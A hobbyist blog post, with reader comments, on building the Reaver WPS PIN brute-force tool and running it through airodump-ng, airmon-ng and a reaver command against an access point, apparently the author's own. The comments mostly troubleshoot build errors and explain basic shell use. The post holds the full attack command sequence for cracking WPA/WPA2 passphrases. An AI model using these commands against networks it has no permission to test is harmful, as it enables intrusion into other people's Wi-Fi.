Hello internet,
I've been hearing all about this tool "Reaver":
Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases, as described in http://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf1) Download (I downloaded the latest tar.gz, 1.2)
2) Ungzip, untar: `tar xvfz reaver-1.2.tar.gz`
3) Install dependencies: `sudo apt-get install libpcap-dev`
*NOTE* -- It seems like it may also depend on sql-lite ... or something, this is from the comments:
3a.) `sudo apt-get install libsqlite3-dev`
4) config, make install:
`./configure`
`make`
`sudo make install`
5)now type `reaver` at the command line to see usage :)
You'll also probably want the aircrack-ng suite if you haven't done any wifi cracking/recon/diddling before...
~NOW~
I'm going to just type out what I'm doing as I go along to actually use reaver.
1) `sudo airodump-ng eth1` checking the BSSIDs and looking for my WPA2 AP.
2) `sudo airmon-ng start eth1`
3) exit, then open reaver `sudo reaver -i eth1 -b 00:11:22:33:44:55 -c 11 -vv`
Now... I'm not sure if it's doing it's magick, I'll check wireshark soon, and maybe read the paper about the vulnerability, but I'm in skirpt kiddy mode at the moment.
*edit*
It wasn't doing it's magic. My card doesn't support packet INJECTION, oh well maybe someday I'll get a real man's wifi interface.
Good luck!
Also here's someone actually running the attack:
Nice ... It worked fine ...
ReplyDeleteIm running Ubuntu 11.10 32bit on a 4 gig flashdrive and I cannot get it to configure. When I type ./configure it comes back with Permission Denied. I am in the proper directory when I run the command and yes its all extracted proper as well.
ReplyDeleteAny thoughts?
Try to run the commands as root
Deletesudo ./configure
sudo make
sudo make install
it will ask you for your password. Enter your password and press enter.
NOTE : if you boot from USB/DVD you do not have a password so just press "Enter"
the secret is:
ReplyDeletechmod a+x configure
When I try to do this on an Ubuntu live CD running, I get:
ReplyDeletechecking for pcap_open_live in -lpcap... no
error: pcap library not found!
Apt-get claims that libpcap-dev is in its newest version.
I'm not sure what you could do, I know there's probably more examples (or will work) with a different live CD (more security oriented) like Backtrack or something.
DeleteIf "locate" is installed you could do something like `locate pcap.h` and copy the directory into the make file where it says soemthing like gcc/g++ -I/usr/lib/pcap1.66/
I don't know this is all off the top of my head, gl
also what step are you getting that error? ./configure or make?
DeleteI'm not the same person who asked first. I have the same error when I do configure. I have already installed the libpcap-dev but the error is still there
DeleteSame error here. Is in ./configure step, when it tries to detect if all necessary libraries are present.
DeleteOK, i solved the issue: just run: sudo apt-get install libsqlite3-dev
DeleteThen, try ./configure and all should be OK.
I'll add that to the post, thanks for taking the time to help out the community.
DeleteE: Unable to lock the download directory
ReplyDeletesudo or look at the other comments above
Deleteyou guys are speaking gibberish to me. i don't know how to do the .configure and this is really frustrating. i tried executing the configure script in the terminal but it doesn't do anything. i've tried entering all the stuff into the terminal, arg, i'm a noob..
ReplyDeletelol :)
DeleteOk well it's a good idea to learn about what each thing is doing. sudo is a command that gives the next commands higher (root) privileges on the system.
Also it's not .configure, it's ./configure. The ./ means to the computer "look in the current directory for the file that's after the slash and try to execute it". ./configure should execute the file in the directory you're in.
If you aren't familiar with "directory transversal" do that! It should be something to learn before doing anything else! Commands like `ls` (lists files/directories) and `cd` (change directory). Tab completion is also very useful. Say you download and extract the tar (tape archive, its an old term from when files were stored on tapes) file, you can type cd reav and the bash should complete the file name so you don't have to painfully type each character out.
Anyway... hard to know where you are going wrong! Hope that's no gibberish above, I'd like to look at myself as a good teacher :p
"cd reav[tab]"**
ReplyDelete